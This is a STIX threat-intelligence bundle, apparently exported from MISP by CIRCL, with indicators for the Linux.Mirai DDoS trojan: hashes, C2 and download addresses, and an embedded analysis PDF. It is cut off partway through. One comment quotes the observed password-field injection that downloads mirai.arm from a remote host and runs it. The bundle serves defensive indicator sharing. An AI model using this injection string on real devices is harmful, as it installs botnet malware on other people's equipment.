530 lines
1.3 MiB
JSON
530 lines
1.3 MiB
JSON
|
{
|
||
|
"type": "bundle",
|
||
|
"id": "bundle--57ef6d48-20c8-4e55-9f02-468f950d210f",
|
||
|
"objects": [
|
||
|
{
|
||
|
"type": "identity",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2016-10-01T08:12:49.000Z",
|
||
|
"modified": "2016-10-01T08:12:49.000Z",
|
||
|
"name": "CIRCL",
|
||
|
"identity_class": "organization"
|
||
|
},
|
||
|
{
|
||
|
"type": "report",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "report--57ef6d48-20c8-4e55-9f02-468f950d210f",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2016-10-01T08:12:49.000Z",
|
||
|
"modified": "2016-10-01T08:12:49.000Z",
|
||
|
"name": "OSINT - Investigation of Linux.Mirai Trojan family",
|
||
|
"published": "2016-10-01T08:13:16Z",
|
||
|
"object_refs": [
|
||
|
"x-misp-attribute--57ef6d8e-6630-40f3-976b-4234950d210f",
|
||
|
"observed-data--57ef6dc0-16dc-4e4e-980b-4ebb950d210f",
|
||
|
"file--57ef6dc0-16dc-4e4e-980b-4ebb950d210f",
|
||
|
"artifact--57ef6dc0-16dc-4e4e-980b-4ebb950d210f",
|
||
|
"indicator--57ef6de3-827c-4967-9708-42ce950d210f",
|
||
|
"indicator--57ef6de3-f1b0-4776-9e5a-4add950d210f",
|
||
|
"indicator--57ef6de3-b284-456d-b74a-4b63950d210f",
|
||
|
"indicator--57ef6e99-0a20-4839-a902-4e4d950d210f",
|
||
|
"indicator--57ef6eec-c238-49ec-a6f8-4521950d210f",
|
||
|
"indicator--57ef6efb-b9fc-498a-a704-4f7f950d210f",
|
||
|
"indicator--57ef6f17-16f4-4e11-b0ce-4e91950d210f",
|
||
|
"x-misp-attribute--57ef6f37-5074-4e2b-85e6-4599950d210f",
|
||
|
"observed-data--57ef6f4f-8220-43c7-912c-4818950d210f",
|
||
|
"url--57ef6f4f-8220-43c7-912c-4818950d210f",
|
||
|
"indicator--57ef7002-6900-46c9-ac17-465d02de0b81",
|
||
|
"indicator--57ef7002-0194-4671-b962-44fa02de0b81",
|
||
|
"observed-data--57ef7002-0738-471a-8108-4e7502de0b81",
|
||
|
"url--57ef7002-0738-471a-8108-4e7502de0b81",
|
||
|
"indicator--57ef7002-2174-4783-bf9b-4e0a02de0b81",
|
||
|
"indicator--57ef7003-6fac-4d16-86e4-411502de0b81",
|
||
|
"observed-data--57ef7003-9390-423a-a424-4b2a02de0b81",
|
||
|
"url--57ef7003-9390-423a-a424-4b2a02de0b81",
|
||
|
"indicator--57ef7003-e8e4-4eee-b196-4b8e02de0b81",
|
||
|
"indicator--57ef7003-2388-4060-a02f-48c602de0b81",
|
||
|
"observed-data--57ef7003-07c0-4d57-a1d9-4a2d02de0b81",
|
||
|
"url--57ef7003-07c0-4d57-a1d9-4a2d02de0b81"
|
||
|
],
|
||
|
"labels": [
|
||
|
"Threat-Report",
|
||
|
"misp:tool=\"MISP-STIX-Converter\"",
|
||
|
"circl:incident-classification=\"malware\"",
|
||
|
"type:OSINT",
|
||
|
"ms-caro-malware:malware-type=\"DDoS\"",
|
||
|
"ms-caro-malware:malware-platform=\"Linux\"",
|
||
|
"misp-galaxy:tool=\"Mirai\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "x-misp-attribute",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "x-misp-attribute--57ef6d8e-6630-40f3-976b-4234950d210f",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2016-10-01T08:02:22.000Z",
|
||
|
"modified": "2016-10-01T08:02:22.000Z",
|
||
|
"labels": [
|
||
|
"misp:type=\"comment\"",
|
||
|
"misp:category=\"External analysis\""
|
||
|
],
|
||
|
"x_misp_category": "External analysis",
|
||
|
"x_misp_type": "comment",
|
||
|
"x_misp_value": "A Trojan for Linux that was named Linux.Mirai has several predecessors. The first malware program belonging to this family was spotted in May 2016 and was dubbed Linux.DDoS.87. At the beginning of August, a new version of this Trojan Linux.DDoS.89 was discovered. Finally, Doctor Web\u00e2\u20ac\u2122s security researchers investigated the \r\nLinux.Mirai Trojan found later that month."
|
||
|
},
|
||
|
{
|
||
|
"type": "observed-data",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "observed-data--57ef6dc0-16dc-4e4e-980b-4ebb950d210f",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2016-10-01T08:03:12.000Z",
|
||
|
"modified": "2016-10-01T08:03:12.000Z",
|
||
|
"first_observed": "2016-10-01T08:03:12Z",
|
||
|
"last_observed": "2016-10-01T08:03:12Z",
|
||
|
"number_observed": 1,
|
||
|
"object_refs": [
|
||
|
"file--57ef6dc0-16dc-4e4e-980b-4ebb950d210f",
|
||
|
"artifact--57ef6dc0-16dc-4e4e-980b-4ebb950d210f"
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"attachment\"",
|
||
|
"misp:category=\"External analysis\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "file",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "file--57ef6dc0-16dc-4e4e-980b-4ebb950d210f",
|
||
|
"name": "Investigation_of_Linux.Mirai_Trojan_family_en.pdf",
|
||
|
"content_ref": "artifact--57ef6dc0-16dc-4e4e-980b-4ebb950d210f"
|
||
|
},
|
||
|
{
|
||
|
"type": "artifact",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "artifact--57ef6dc0-16dc-4e4e-980b-4ebb950d210f",
|
||
|
"payload_bin": "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
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--57ef6de3-827c-4967-9708-42ce950d210f",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2016-10-01T08:03:47.000Z",
|
||
|
"modified": "2016-10-01T08:03:47.000Z",
|
||
|
"description": "x86",
|
||
|
"pattern": "[file:hashes.SHA1 = 'c129e2a23abe826f808725a0724f12470502a3cc']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2016-10-01T08:03:47Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "Payload delivery"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"sha1\"",
|
||
|
"misp:category=\"Payload delivery\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--57ef6de3-f1b0-4776-9e5a-4add950d210f",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2016-10-01T08:03:47.000Z",
|
||
|
"modified": "2016-10-01T08:03:47.000Z",
|
||
|
"description": "ARM",
|
||
|
"pattern": "[file:hashes.SHA1 = '8fd0d16edf270c453c5b6b2481d0a044a410c7cd']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2016-10-01T08:03:47Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "Payload delivery"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"sha1\"",
|
||
|
"misp:category=\"Payload delivery\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--57ef6de3-b284-456d-b74a-4b63950d210f",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2016-10-01T08:03:47.000Z",
|
||
|
"modified": "2016-10-01T08:03:47.000Z",
|
||
|
"description": "ARM",
|
||
|
"pattern": "[file:hashes.SHA1 = '9ff383309ad63da2caa9580d7d85abeece9b13a0']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2016-10-01T08:03:47Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "Payload delivery"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"sha1\"",
|
||
|
"misp:category=\"Payload delivery\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--57ef6e99-0a20-4839-a902-4e4d950d210f",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2016-10-01T08:06:49.000Z",
|
||
|
"modified": "2016-10-01T08:06:49.000Z",
|
||
|
"pattern": "[file:name = '.shinigami']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2016-10-01T08:06:49Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "Artifacts dropped"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"filename\"",
|
||
|
"misp:category=\"Artifacts dropped\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--57ef6eec-c238-49ec-a6f8-4521950d210f",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2016-10-01T08:08:12.000Z",
|
||
|
"modified": "2016-10-01T08:08:12.000Z",
|
||
|
"pattern": "[url:value = 'http://5.206.225.122/bins/mirai.arm']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2016-10-01T08:08:12Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "Payload delivery"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"url\"",
|
||
|
"misp:category=\"Payload delivery\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--57ef6efb-b9fc-498a-a704-4f7f950d210f",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2016-10-01T08:08:27.000Z",
|
||
|
"modified": "2016-10-01T08:08:27.000Z",
|
||
|
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '5.206.225.122']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2016-10-01T08:08:27Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "Network activity"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"ip-dst\"",
|
||
|
"misp:category=\"Network activity\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--57ef6f17-16f4-4e11-b0ce-4e91950d210f",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2016-10-01T08:08:55.000Z",
|
||
|
"modified": "2016-10-01T08:08:55.000Z",
|
||
|
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '151.80.99.84']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2016-10-01T08:08:55Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "Network activity"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"ip-dst\"",
|
||
|
"misp:category=\"Network activity\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "x-misp-attribute",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "x-misp-attribute--57ef6f37-5074-4e2b-85e6-4599950d210f",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2016-10-01T08:09:27.000Z",
|
||
|
"modified": "2016-10-01T08:09:27.000Z",
|
||
|
"labels": [
|
||
|
"misp:type=\"comment\"",
|
||
|
"misp:category=\"Payload delivery\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
],
|
||
|
"x_misp_category": "Payload delivery",
|
||
|
"x_misp_comment": "The malware was installed on a dvr and was started with this bash injection in password field",
|
||
|
"x_misp_type": "comment",
|
||
|
"x_misp_value": "Password=;tftp -l /dev/dvrHelper -r mirai.arm -g 151.80.99.84 || wget http://5.206.225.122/bins/mirai.arm -O /dev/dvrHelper; chmod 777 /dev/dvrHelper; cd /dev; ./dvrHelper 2>&1;/bin/busybox MIRAI 2>&1;"
|
||
|
},
|
||
|
{
|
||
|
"type": "observed-data",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "observed-data--57ef6f4f-8220-43c7-912c-4818950d210f",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2016-10-01T08:09:51.000Z",
|
||
|
"modified": "2016-10-01T08:09:51.000Z",
|
||
|
"first_observed": "2016-10-01T08:09:51Z",
|
||
|
"last_observed": "2016-10-01T08:09:51Z",
|
||
|
"number_observed": 1,
|
||
|
"object_refs": [
|
||
|
"url--57ef6f4f-8220-43c7-912c-4818950d210f"
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"link\"",
|
||
|
"misp:category=\"External analysis\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "url",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "url--57ef6f4f-8220-43c7-912c-4818950d210f",
|
||
|
"value": "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4477"
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--57ef7002-6900-46c9-ac17-465d02de0b81",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2016-10-01T08:12:50.000Z",
|
||
|
"modified": "2016-10-01T08:12:50.000Z",
|
||
|
"description": "ARM - Xchecked via VT: 9ff383309ad63da2caa9580d7d85abeece9b13a0",
|
||
|
"pattern": "[file:hashes.SHA256 = 'f8fcaa18be035d0448de7db6781c5e495b665bd3844119171714431a3c1aedbc']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2016-10-01T08:12:50Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "Payload delivery"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"sha256\"",
|
||
|
"misp:category=\"Payload delivery\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--57ef7002-0194-4671-b962-44fa02de0b81",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2016-10-01T08:12:50.000Z",
|
||
|
"modified": "2016-10-01T08:12:50.000Z",
|
||
|
"description": "ARM - Xchecked via VT: 9ff383309ad63da2caa9580d7d85abeece9b13a0",
|
||
|
"pattern": "[file:hashes.MD5 = '78440b86e34579001bea6ebc600751f5']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2016-10-01T08:12:50Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "Payload delivery"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"md5\"",
|
||
|
"misp:category=\"Payload delivery\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "observed-data",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "observed-data--57ef7002-0738-471a-8108-4e7502de0b81",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2016-10-01T08:12:50.000Z",
|
||
|
"modified": "2016-10-01T08:12:50.000Z",
|
||
|
"first_observed": "2016-10-01T08:12:50Z",
|
||
|
"last_observed": "2016-10-01T08:12:50Z",
|
||
|
"number_observed": 1,
|
||
|
"object_refs": [
|
||
|
"url--57ef7002-0738-471a-8108-4e7502de0b81"
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"link\"",
|
||
|
"misp:category=\"External analysis\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "url",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "url--57ef7002-0738-471a-8108-4e7502de0b81",
|
||
|
"value": "https://www.virustotal.com/file/f8fcaa18be035d0448de7db6781c5e495b665bd3844119171714431a3c1aedbc/analysis/1465114448/"
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--57ef7002-2174-4783-bf9b-4e0a02de0b81",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2016-10-01T08:12:50.000Z",
|
||
|
"modified": "2016-10-01T08:12:50.000Z",
|
||
|
"description": "ARM - Xchecked via VT: 8fd0d16edf270c453c5b6b2481d0a044a410c7cd",
|
||
|
"pattern": "[file:hashes.SHA256 = '7cf5d0188e43a9a46676d8e71dc251c0871b23eff9d66f89d7eabaeba7a3d2cc']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2016-10-01T08:12:50Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "Payload delivery"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"sha256\"",
|
||
|
"misp:category=\"Payload delivery\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--57ef7003-6fac-4d16-86e4-411502de0b81",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2016-10-01T08:12:51.000Z",
|
||
|
"modified": "2016-10-01T08:12:51.000Z",
|
||
|
"description": "ARM - Xchecked via VT: 8fd0d16edf270c453c5b6b2481d0a044a410c7cd",
|
||
|
"pattern": "[file:hashes.MD5 = 'e64079b3ccf906204474beca1f5cc41d']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2016-10-01T08:12:51Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "Payload delivery"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"md5\"",
|
||
|
"misp:category=\"Payload delivery\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "observed-data",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "observed-data--57ef7003-9390-423a-a424-4b2a02de0b81",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2016-10-01T08:12:51.000Z",
|
||
|
"modified": "2016-10-01T08:12:51.000Z",
|
||
|
"first_observed": "2016-10-01T08:12:51Z",
|
||
|
"last_observed": "2016-10-01T08:12:51Z",
|
||
|
"number_observed": 1,
|
||
|
"object_refs": [
|
||
|
"url--57ef7003-9390-423a-a424-4b2a02de0b81"
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"link\"",
|
||
|
"misp:category=\"External analysis\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "url",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "url--57ef7003-9390-423a-a424-4b2a02de0b81",
|
||
|
"value": "https://www.virustotal.com/file/7cf5d0188e43a9a46676d8e71dc251c0871b23eff9d66f89d7eabaeba7a3d2cc/analysis/1464739147/"
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--57ef7003-e8e4-4eee-b196-4b8e02de0b81",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2016-10-01T08:12:51.000Z",
|
||
|
"modified": "2016-10-01T08:12:51.000Z",
|
||
|
"description": "x86 - Xchecked via VT: c129e2a23abe826f808725a0724f12470502a3cc",
|
||
|
"pattern": "[file:hashes.SHA256 = '45b7fa5ad2eae5b32b15ccef313713a37481b6178c4c8bbbb524822a56883b56']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2016-10-01T08:12:51Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "Payload delivery"
|
||
|
}
|
||
|
],
|
||
